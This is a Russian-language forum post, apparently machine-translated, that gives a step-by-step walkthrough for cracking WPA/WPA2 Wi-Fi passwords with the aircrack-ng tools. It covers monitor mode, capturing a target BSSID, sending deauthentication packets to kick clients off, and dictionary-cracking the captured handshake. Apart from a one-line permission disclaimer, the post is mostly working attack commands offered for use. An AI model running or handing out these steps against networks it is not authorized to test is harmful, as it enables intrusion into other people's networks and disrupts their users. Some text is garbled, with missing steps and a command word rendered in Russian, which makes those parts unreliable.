- Автор темы
- #1
Взлом WiFi звучит действительно круто и интересно. Но на самом деле взломать wifi практически намного проще с хорошим списком слов. Но этот мировой список бесполезен до тех пор, пока мы не будем иметь ни малейшего представления о том, как на самом деле использовать этот список слов для взлома хэша. И прежде чем взломать хэш, нам действительно нужно его сгенерировать. Итак, ниже приведены эти шаги вместе с некоторыми хорошими списками слов для взлома WPA / WPA2 wifi.
Примечание: Используйте приведенные ниже методы только для образовательных / тестовых целей на вашем собственном wifi или с разрешения владельца. Не используйте это в злонамеренных целях.
Итак, загрузите Kali Linux. Откройте окно терминала. И выполните следующие действия.
ifconfig Шаг 1: (настройка интерфейса): для просмотра или изменения конфигурации сетевых интерфейсов в вашей системе.
ifconfig
ifconfig-linux-интерфейс-конфигурация
Здесь,
- eth0: первый интерфейс Ethernet
- l0: интерфейс обратной связи
- wlan0: первый беспроводной сетевой интерфейс в системе. (Это то, что нам нужно.)
airmon-ng check kill
Остановить процесс, который использует wifi linux
Шаг 3: Запустить wlan0 в режиме монитора.
запуск airmon-ng wlan0
Пуск интерфейс
Шаг 4: Для просмотра всех сетей Wi-Fi вокруг вас.
airodump-ng wlan0mon
Просмотр всех WiFi-сетей
Здесь,
- airodump-ng: для захвата пакетов
- wlan0mon: имя интерфейса (это имя может отличаться на разных устройствах)
Шаг 5: Для просмотра клиентов, подключенных к целевой сети.
airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w / root wlan0mon
Просмотр подключенных клиентов к цели
Здесь,
- airodump-ng: для захвата пакетов
- -c: Канал
- –bssid: MAC-адрес беспроводной точки доступа (WAP).
- -w: Каталог, в котором вы хотите сохранить файл (файл пароля).
- wlan0mon: название интерфейса.
aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon
- aireplay-ng: для ввода фреймов
- -0: для деаутентификации
- 10: Количество отправляемых пакетов деаутентификации
- -a: для bssid целевой сети
- wlan0mon: название интерфейса.
Теперь мы закончили с захватом пакетов. Итак, теперь вы можете закрыть окно терминала.
Шаг 7. Чтобы расшифровать пароль. Откройте приложение Files (Файлы).
Здесь,
hacking-01.cap - это нужный вам файл.
aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap
- aircrack-ng: программа для взлома ключей 802.11 WEP и WPA-PSK
- -a: -a2 для WPA2 и -a для сети WPA
- -b: BSSID целевой сети
- -w: расположение файла списка слов
- /root/hacking-01.cap : расположение файла cap
- Telegram
